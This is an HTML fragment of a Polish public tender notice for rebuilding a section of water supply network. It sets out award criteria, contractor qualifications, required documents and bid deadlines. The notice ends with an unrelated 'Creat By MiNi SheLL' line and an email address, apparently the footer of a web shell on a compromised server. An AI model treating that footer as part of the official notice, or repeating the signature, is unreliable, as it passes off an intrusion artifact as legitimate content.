class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień na podstawie art. 214 ust. 1 pkt 7 i 8 ustawy Pzp polegające na powtórzeniu podobnych robót budowlanych, których zakres i wartość nie przekroczy kwot netto 61 507,20 PLN<br/>Zamówienie podobne będzie polegać w szczególności m.in. na wykonaniu przebudowy odcinka sieci wodociągowej wraz z przyłączami, na zasadach opisanych w projektowanych postanowieniach umowy w sprawie zamówienia publicznego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>cena i okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi na cały zakres zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ZDOLNOŚCI TECHNICZNEJ LUB ZAWODOWEJ:<br/>a)	doświadczenie Wykonawcy:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie lub remoncie sieci wodociągowej o długości co najmniej 100 mb.<br/>W przypadku składania oferty na część nr 1, i/lub nr 2, i/ lub nr 3 (w przypadku składania ofert na dwie lub trzy części przez jednego Wykonawcę, Wykonawca może wskazać jedną robotę budowlaną dla tych części).<br/>b)	kwalifikacje zawodowe kadry technicznej:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować: <br/>- jedną osobą, która będzie pełniła funkcję kierownika budowy posiadającą ważne uprawnienia budowlane do kierowania robotami w zakresie sieci wodociągowych i kanalizacyjnych.<br/><br/>W przypadku składania oferty na część nr 1 i/lub nr 2, i/lub nr 3 (w przypadku składania ofert na dwie i/lub trzy części przez jednego Wykonawcę, Wykonawca może wskazać jednego kierownika budowy dla tych części). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616 ze zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej;<br/><br/>b)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/><br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:<br/>1) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w pkt 2.1. – b) - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której informacja albo dokument dotyczy, potwierdzające odpowiednio, że:,<br/>a)	nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/><br/>2)	Dokumenty potwierdzające w/w okoliczności powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; <br/><br/>b)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> - c)	zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia w przypadku, gdy Wykonawca w celu spełnienia warunków, o którym mowa w Rozdziale II pkt 7 ppkt 4 SWZ, będzie polegał na zdolnościach technicznych lub zawodowych innych podmiotów.<br/>- •	gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> • oświadczenie o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do SWZ	Oświadczenia składają odrębnie każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/><br/>• w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia Wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych Wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>-	postępowania o zamówienie publiczne, którego dotyczy,<br/>-	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>-	ustanowionego pełnomocnika oraz zakresu jego umocowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zawiera załącznik nr 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy e-Zamówienia, zakładka „Oferty/wnioski&#34;, w podglądzie postępowania po zalogowaniu na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę&#34; są dwa pola drag&amp;drop („przeciągnij&#34; i „upuść&#34;) i dodaje wybrany z dysku i uprzednio podpisany „Formularz oferty&#34; w pierwszym polu. W kolejnym polu („Załączniki do oferty..&#34;)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-28 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com